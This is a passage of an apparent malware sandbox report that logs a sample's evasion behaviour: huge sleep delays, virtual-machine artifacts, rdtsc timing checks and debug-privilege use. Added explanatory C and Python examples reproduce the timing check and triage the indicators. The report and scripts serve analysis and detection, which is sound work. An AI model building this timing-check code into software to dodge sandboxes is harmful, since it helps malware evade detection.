Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (163 identical entries)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX (52 identical entries)
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000408A34 second address: 0000000000408A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000408DCE second address: 0000000000408DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 0000000003218A34 second address: 0000000003218A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 0000000003218DCE second address: 0000000003218DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
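The four RDTSC interceptor entries above show the timing check the sample runs from RegAsm.exe and WWAHost.exe: two rdtsc reads with only an xor/add between them, so the low 32 bits of the first reading are parked in ecx and compared against the second. The report shows only those four instructions, not the subtraction or the threshold that follows. The C program below is an added example, not the sample's code and not part of this report; it reproduces the measurement and shows why a sandbox intercepts the instruction: under a hypervisor that traps rdtsc, a single-stepping debugger, or an emulator, the delta between two back-to-back reads grows by orders of magnitude. The `threshold` parameter, the min-of-N-trials filter and the non-x86 fallback to a monotonic clock are assumptions made so the example runs anywhere.

```c
#define _POSIX_C_SOURCE 199309L
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#endif

/* Read the timestamp counter. On x86 this is the rdtsc instruction the
 * sandbox intercepted; elsewhere (portability assumption, not something
 * the sample does) fall back to a nanosecond monotonic clock. */
static uint64_t read_tsc(void) {
#if defined(__x86_64__) || defined(__i386__)
    return __rdtsc();
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* Equivalent of the intercepted sequence:
 *   rdtsc            ; first reading in edx:eax
 *   xor ecx, ecx
 *   add ecx, eax     ; keep the low 32 bits of the first reading
 *   rdtsc            ; second reading
 * The full 64-bit counter is used here, and the subtraction the report
 * does not show is made explicit. */
uint64_t tsc_delta_once(void) {
    uint64_t first = read_tsc();
    uint64_t second = read_tsc();
    return second - first;
}

/* Smallest delta over several trials: interrupts and context switches
 * inflate single measurements, so a min filter gives a stable baseline. */
uint64_t tsc_delta_min(int trials) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < trials; i++) {
        uint64_t d = tsc_delta_once();
        if (d < best) best = d;
    }
    return best;
}

/* The decision the sample would take after the two reads. The threshold
 * is a caller-supplied assumption; the report does not reveal the value
 * the sample uses. Back-to-back rdtsc costs tens of cycles on bare metal
 * and thousands or more when each rdtsc is trapped or emulated. */
int looks_instrumented(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

int main(void) {
    uint64_t d = tsc_delta_min(1000);
    printf("min rdtsc delta over 1000 trials: %" PRIu64 "\n", d);
    printf("verdict at threshold 1000: %s\n",
           looks_instrumented(d, 1000) ? "instrumented" : "clean");
    return 0;
}
```

Build with `cc -O2 rdtsc_check.c` and run it once on bare metal and once inside the analysis VM to see the gap the sample relies on. The interceptor addresses in the entries above are where an analyst would patch the second read or force the comparison to fail so the sample proceeds to its injection stage.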
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6756 Thread sleep time: -70000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4804 Thread sleep count: 4438 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040 Thread sleep count: 2175 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6968 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040 Thread sleep count: 4180 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080 Thread sleep count: 554 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7056 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3024 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772 Thread sleep count: 6258 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784 Thread sleep count: 1964 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5092 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00408D00 rdtsc 15_2_00408D00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (11 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6782
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 913
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2175
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 554
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3746
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3548
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6258
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1964
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 8.5 %
Source: C:\Windows\SysWOW64\WWAHost.exe API coverage: 8.6 %
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (11 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: explorer.exe, 00000006.00000002.888130774.000000000056B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpH
Source: explorer.exe, 00000006.00000000.516443809.00000000005AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:e!kN
Source: explorer.exe, 00000006.00000000.516443809.00000000005AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000001.00000002.409234247.000001FD33770000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.450956664.00000181CCDC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00408D00 rdtsc 15_2_00408D00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WWAHost.exe Process token adjusted: Debug
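The evidence lines in this part of the report (the thread delay of 922337203685477 ms, the hypervisor device strings found in explorer.exe memory, the rdtsc timing check in RegAsm.exe, the SeDebugPrivilege adjustments, and the long run of fs:[30h] PEB reads that follows) are easier to act on once they are collapsed per process and per function. The Python script below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It parses a constructed subset of the lines above and assumes the reported delay time is in milliseconds: on that reading 922337203685477 is exactly (2^63 - 1) / 10000, the largest relative NtDelayExecution interval (100 ns units) converted to ms, so the script treats it as a wait that never returns inside an analysis window. The one-hour threshold and the VM marker list are the example's own choices.

```python
"""Triage helper for Joe Sandbox 'Source:' evidence lines (added example, not report tooling)."""
import re
from collections import Counter, defaultdict

# Constructed sample: a representative subset of the evidence lines in this
# section, embedded so the script runs offline.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000006.00000002.888130774.000000000056B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpH
Source: explorer.exe, 00000006.00000000.516443809.00000000005AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00408D00 rdtsc 15_2_00408D00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294D294 mov eax, dword ptr fs:[00000030h] 15_2_0294D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294D294 mov eax, dword ptr fs:[00000030h] 15_2_0294D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02915210 mov ecx, dword ptr fs:[00000030h] 15_2_02915210
""".strip().splitlines()

# Assumption: the sandbox reports delay time in milliseconds. On that reading
# 922337203685477 == (2**63 - 1) // 10_000, i.e. the largest relative
# NtDelayExecution interval (100 ns units) converted to ms: a never-returning wait.
MAX_RELATIVE_WAIT_MS = (2**63 - 1) // 10_000
LONG_DELAY_MS = 60 * 60 * 1000          # example threshold: longer than any sandbox run
VM_MARKERS = ("vmwar", "hyper-v", "vbox", "virtualbox", "qemu")  # example marker list

DELAY_RE = re.compile(r"^Source: (?P<proc>.+?) Thread delayed: delay time: (?P<ms>\d+)")
MEMSTR_RE = re.compile(r"^Source: (?P<proc>.+?) Binary or memory string: (?P<text>.*)$")
RDTSC_RE = re.compile(r"^Source: (?P<proc>.+?) Code function: (?P<fn>\S+) rdtsc\b")
TOKEN_RE = re.compile(r"^Source: (?P<proc>.+?) Process token adjusted: (?P<priv>\w+)")
# fs:[30h] is TEB->ProcessEnvironmentBlock on 32-bit Windows; reading it is the
# first step of BeingDebugged / NtGlobalFlag style anti-debug checks.
PEB_RE = re.compile(r"^Source: (?P<proc>.+?) Code function: (?P<fn>\S+) mov \w+, dword ptr fs:\[00000030h\]")


def delay_years(ms):
    """Convert a millisecond delay into years (365.25-day years)."""
    return ms / 1000 / (365.25 * 24 * 3600)


def _process_names(source_field):
    """'explorer.exe, 0000...sdmp' -> 'explorer.exe' (drop dump ids, keep order, dedupe)."""
    names = [p for p in source_field.split(", ") if not p.endswith(".sdmp")]
    return ", ".join(dict.fromkeys(names))


def triage(lines):
    """Collapse evidence lines into per-process, per-function indicators."""
    result = {
        "infinite_delays": [],              # (process, ms)
        "vm_artifacts": [],                 # (process, marker, memory string)
        "rdtsc_functions": defaultdict(set),
        "debug_privilege": Counter(),       # process -> SeDebugPrivilege enable count
        "peb_reads": defaultdict(Counter),  # process -> function -> fs:[30h] read count
        "unparsed": 0,
    }
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if m := DELAY_RE.match(line):
            ms = int(m["ms"])
            if ms >= LONG_DELAY_MS:
                result["infinite_delays"].append((m["proc"], ms))
        elif m := MEMSTR_RE.match(line):
            low = m["text"].lower()
            marker = next((k for k in VM_MARKERS if k in low), None)
            if marker:
                result["vm_artifacts"].append((_process_names(m["proc"]), marker, m["text"]))
        elif m := RDTSC_RE.match(line):
            result["rdtsc_functions"][m["proc"]].add(m["fn"])
        elif m := TOKEN_RE.match(line):
            if m["priv"] == "Debug":
                result["debug_privilege"][m["proc"]] += 1
        elif m := PEB_RE.match(line):
            result["peb_reads"][m["proc"]][m["fn"]] += 1
        else:
            result["unparsed"] += 1
    result["rdtsc_functions"] = {p: sorted(f) for p, f in result["rdtsc_functions"].items()}
    result["peb_reads"] = {p: dict(c) for p, c in result["peb_reads"].items()}
    return result


def summarize(result):
    """One human-readable finding per process/indicator."""
    out = []
    for proc, ms in result["infinite_delays"]:
        tag = "max relative NtDelayExecution interval" if ms == MAX_RELATIVE_WAIT_MS else "very long"
        out.append(f"[evasion] {proc}: sleep {ms} ms (~{delay_years(ms):,.0f} years, {tag})")
    for proc, marker, text in result["vm_artifacts"]:
        out.append(f"[vm-artifact] {proc}: '{marker}' in memory string {text[:60]!r}")
    for proc, fns in result["rdtsc_functions"].items():
        out.append(f"[timing-check] {proc}: rdtsc in {', '.join(fns)}")
    for proc, n in result["debug_privilege"].items():
        out.append(f"[privilege] {proc}: SeDebugPrivilege enabled {n}x")
    for proc, fns in result["peb_reads"].items():
        out.append(f"[anti-debug] {proc}: {sum(fns.values())} fs:[30h] PEB reads in {len(fns)} distinct functions")
    return out


if __name__ == "__main__":
    for finding in summarize(triage(SAMPLE_LINES)):
        print(finding)
```

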